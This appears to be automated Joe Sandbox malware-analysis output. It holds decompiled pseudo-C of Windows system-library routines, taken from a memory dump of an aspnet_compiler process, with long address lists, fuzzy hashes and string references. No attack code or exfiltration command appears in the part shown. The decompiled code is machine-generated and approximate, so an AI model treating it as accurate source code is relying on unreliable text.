0x0119e644
0x0119e64d
0x0119e652
0x0119e657
0x0119e659
0x0119e65b
0x0119e661
0x0119e662
0x0119e664
0x0119e665
0x0119e66e
0x0119e67d
0x0119e68a
0x0119e691
0x0119e691
0x0119e66e
0x0119e6b0
0x00000000
0x0119e6b6
0x0119e6bd
0x0119e6c7
0x0119e6d7
0x0119e6d9
0x0119e6db
0x0119e6de
0x0119e6e3
0x0119e6f3
0x0119e6fc
0x0119e700
0x0119e700
0x0119e704
0x0119e70a
0x0119e70a
0x0119e713
0x0119e716
0x0119e719
0x0119e720
0x0119e761
0x0119e76b
0x0119e774
0x0119e77a
0x0119e77a
0x0119e78a
0x0119e791
0x0119e799
0x0119e79b
0x0119e79f
0x0119e7aa
0x0119e7c0
0x0119e7ac
0x0119e7b2
0x0119e7b9
0x0119e7b9
0x0119e7c7
0x0119e806
0x00000000
0x0119e7c9
0x0119e7d1
0x0119e7d8
0x00000000
0x0119e7d8
0x00000000
0x00000000
0x0119e722
0x0119e72e
0x0119e748
0x0119e74c
0x0119e754
0x0119e756
0x0119e75c
0x0119e75c
0x00000000
0x0119e75c
0x0119e758
0x0119e758
0x00000000
0x0119e758
0x0119e750
0x00000000
0x00000000
0x0119e752
0x00000000
0x0119e752
0x0119e730
0x0119e735
0x0119e73d
0x0119e73f
0x00000000
0x00000000
0x0119e741
0x0119e741
0x00000000
0x0119e741
0x0119e739
0x00000000
0x00000000
0x0119e73b
0x00000000
0x0119e73b
0x0119e722
0x0119e720
0x0119e6b0
0x0119e618
0x00000000
0x0119e618

Strings

`, xrefs: 0119E670
`, xrefs: 0119E5D7

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 6e91aa2402be187aaf254aec51abe4b24c6d360bc81846998bdc8bba62008d99
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 6C91A1312057429FEB28CF29C841B5BBBE5BF84714F14892DF6A5CB280E774E904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 011551BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E011551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x11b05f0);
				E0112D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E010EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E011553CA(0);
						return E0112D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0111F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E010F3690(1, _t117, 0x10b1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0111AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L010F4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0111AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0115500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01119860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x011551be
0x011551c3
0x011551c8
0x011551cd
0x011551d0
0x011551d3
0x011551d8
0x011551db
0x011551de
0x011551e0
0x011551e3
0x011551e6
0x011551e8
0x01155342
0x01155351
0x01155356
0x0115535a
0x01155360
0x01155363
0x01155366
0x01155369
0x01155369
0x0115536b
0x0115536b
0x01155370
0x011553a3
0x011553a4
0x011553a6
0x011553ab
0x011553ab
0x011553ae
0x011553ae
0x011553b5
0x011553bf
0x011553bf
0x01155375
0x01155396
0x011553a0
0x011553a0
0x00000000
0x01155396
0x01155377
0x01155379
0x0115537f
0x0115538c
0x01155390
0x00000000
0x01155390
0x011551ee
0x011551f1
0x01155301
0x01155310
0x01155315
0x01155318
0x0115531b
0x01155320
0x0115532e
0x01155331
0x00000000
0x01155331
0x01155328
0x01155329
0x00000000
0x01155329
0x011551fa
0x01155235
0x01155236
0x01155239
0x0115523f
0x01155240
0x01155241
0x01155242
0x01155246
0x01155247
0x0115524e
0x01155251
0x01155267
0x01155269
0x0115526e
0x0115527d
0x0115527e
0x01155281
0x01155282
0x01155287
0x01155288
0x0115528a
0x0115528f
0x01155294
0x00000000
0x00000000
0x0115529a
0x0115529c
0x0115529e
0x0115529e
0x011552a4
0x011552b0
0x00000000
0x00000000
0x011552ba
0x011552bc
0x011552bc
0x011552d4
0x011552d9
0x011552dc
0x011552e1
0x00000000
0x00000000
0x011552e7
0x011552f4
0x00000000
0x011552f4
0x01155270
0x00000000
0x01155270
0x011551fc
0x011551fd
0x01155202
0x01155203
0x01155205
0x0115520a
0x0115520f
0x00000000
0x00000000
0x0115521b
0x01155226
0x0115522b
0x0115521d
0x0115521d
0x01155222
0x01155222
0x0115522d
0x00000000

Strings

Legacy, xrefs: 01155226
UEFI, xrefs: 0115521D

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 093286a195bdc2a3e4eaa321b7ad321cf43d774da9e0962cb51a9a64891b9e87
Instruction ID: 29beb9ac3a04eda942f034aea08252e73e52bc2c145f806c52ee0e3afd99904b
Opcode Fuzzy Hash: 093286a195bdc2a3e4eaa321b7ad321cf43d774da9e0962cb51a9a64891b9e87
Instruction Fuzzy Hash: 9F517D71E04609DFDBA8DFA8C990AADBBF9FF48744F14402DEA59EB252D7709900CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0110513A Relevance: 1.8, APIs: 1, Instructions: 258
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0110513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x11cd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0111D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E010F2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L010F4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0111F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E010EFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x11cb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0111B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x01105142
0x0110514c
0x01105150
0x01105157
0x01105159
0x0110515e
0x01105165
0x01105169
0x0110516c
0x01105172
0x01105176
0x0110517a
0x0110517a
0x0110517a
0x0110517f
0x01146d8b
0x01146d8e
0x01146d91
0x01146d95
0x01146d98
0x01146d9c
0x01146da0
0x01146da3
0x01146da7
0x01146e26
0x01146e26
0x01146e2a
0x011051f9
0x011051f9
0x011051fe
0x01146e33
0x01146e33
0x01146e39
0x01146e3d
0x01146e46
0x01146e50
0x00000000
0x00000000
0x01146e52
0x01146e53
0x01146e56
0x01146e5d
0x00000000
0x00000000
0x00000000
0x01146e5f
0x01146e67
0x01146e77
0x01146e7f
0x01146e80
0x01146e88
0x01146e90
0x01146e9f
0x01146ea5
0x01146ea9
0x01146eb1
0x01146ebf
0x00000000
0x00000000
0x01146ecf
0x01146ed3
0x00000000
0x00000000
0x01146edb
0x01146ede
0x01146ee1
0x01146ee8
0x01146eeb
0x01146eed
0x01146ef0
0x01146ef4
0x01146ef8
0x01146efc
0x00000000
0x00000000
0x01146f0d
0x01146f11
0x01146f32
0x01146f37
0x01146f3b
0x01146f3e
0x01146f41
0x01146f46
0x00000000
0x00000000
0x01146f4c
0x01146f50
0x01146f50
0x01146f54
0x01146f62
0x01146f65
0x01146f6d
0x01146f7b
0x01146f7b
0x01146f93
0x01146f98
0x01146fa0
0x01146fa6
0x01146fb3
0x01146fb6
0x01146fbf
0x01146fc1
0x01146fd5
0x01146fda
0x01146fda
0x01146fdd
0x01146fe2
0x01146fe7
0x01146feb
0x01146fef
0x01146ff3
0x0110520c
0x0110520c
0x0110520f
0x01105215
0x01105234
0x0110523a
0x0110523a
0x01105244
0x01105245
0x01105246
0x01105251
0x01105251
0x01146f13
0x01146f17
0x01146f17
0x01146f18
0x01146f1b
0x01146f1f
0x01146f23
0x00000000
0x01146f28
0x01105204
0x01105204
0x01105208
0x00000000
0x01105208
0x01105185
0x01105188
0x0110518a
0x0110518e
0x01105195
0x01146db1
0x01146db5
0x01146db9
0x0110519b
0x0110519b
0x0110519e
0x011051a7
0x011051a9
0x011051a9
0x011051b5
0x011051b8
0x011051bb
0x011051be
0x011051c1
0x011051c5
0x011051c9
0x011051cd
0x011051cd
0x011051d8
0x011051dc
0x011051e0
0x01146dcc
0x01146dd0
0x01146dd5
0x01146ddd
0x01146de1
0x01146de1
0x01146de5
0x01146deb
0x01146df1
0x01146df7
0x01146dfd
0x01146e01
0x01146e05
0x01146e09
0x01146e0d
0x01146e11
0x01146e11
0x011051eb
0x01146e1a
0x01146e1f
0x01146e21
0x01146e23
0x00000000
0x011051f1
0x011051f1
0x00000000
0x011051f1

APIs

RtlDebugPrintTimes.NTDLL ref: 01105234

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: ddabf23282f7fd68abf7db412860b1378688da44681fbaecfe63d78b17484184
Instruction ID: ae9d2e350b4172a750a8edc66000a8a77cf9a9380944043c1d63443fca4d5bf4
Opcode Fuzzy Hash: ddabf23282f7fd68abf7db412860b1378688da44681fbaecfe63d78b17484184
Instruction Fuzzy Hash: 95C122755083818FD359CF28C480A5AFBF1BF89708F144A6EF9998B392D771E885CB42

Uniqueness

Uniqueness Score: -1.00%

Function 011003E2 Relevance: 1.8, APIs: 1, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E011003E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x11cd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01100548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0111B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E010EB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x11c7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E010F7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E010F7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01157016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01119830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E011569A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x11c7c04 != 0) {
						_t118 = _v12;
						_t120 = E0115A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x11c7bd8;
						if( *0x11c7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E011195D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E011199A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01153540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E010DB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0111AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x11c8474 - 3;
										if( *0x11c8474 != 3) {
											 *0x11c79dc =  *0x11c79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E010F7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E010F7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01157016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x11c8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x11c7b00; // 0x0
							asm("ror esi, cl");
							 *0x11cb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E011195D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E010E7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x011003f1
0x011003f7
0x011003f9
0x011003fb
0x011003fd
0x01100400
0x0110040a
0x01144c7a
0x01100537
0x01100547
0x01100410
0x01100410
0x01100414
0x01100417
0x0110041a
0x01100421
0x01100424
0x0110042b
0x0110043b
0x0110043e
0x0110043f
0x0110043f
0x01100446
0x01100449
0x0110044c
0x0110044f
0x01100459
0x01144c8d
0x0110045f
0x0110045f
0x0110045f
0x01100467
0x01144c97
0x01144c9d
0x01144ca4
0x01144caa
0x01144caf
0x01144cb1
0x01144cc3
0x01144cb3
0x01144cbc
0x01144cbc
0x01144cc8
0x01144ccb
0x01144cd7
0x01144cda
0x01144cdf
0x01144cdf
0x01144ccb
0x01144ca4
0x0110046d
0x0110046f
0x0110046f
0x01100471
0x01100476
0x0110047a
0x0110047b
0x01100483
0x01100489
0x0110048d
0x00000000
0x00000000
0x01144ce9
0x01144cef
0x01144d22
0x01144d22
0x00000000
0x01144d22
0x01144cf1
0x01144cf7
0x00000000
0x00000000
0x01144cf9
0x01144cff
0x00000000
0x00000000
0x01144d05
0x01144d07
0x00000000
0x00000000
0x01144d0d
0x01144d0f
0x01144d14
0x01144d16
0x00000000
0x00000000
0x01144d1c
0x01144d1c
0x01100499
0x01100535
0x01100535
0x00000000
0x01100535
0x011004a6
0x01144d2c
0x01144d37
0x01144d39
0x01144d3b
0x00000000
0x00000000
0x01144d41
0x01144d48
0x01100527
0x0110052b
0x0110052d
0x01100530
0x01100530
0x00000000
0x0110052b
0x01144d4e
0x011004ac
0x011004ac
0x011004af
0x011004b2
0x011004b7
0x011004b9
0x011004bb
0x011004bd
0x011004bf
0x011004c5
0x011004c9
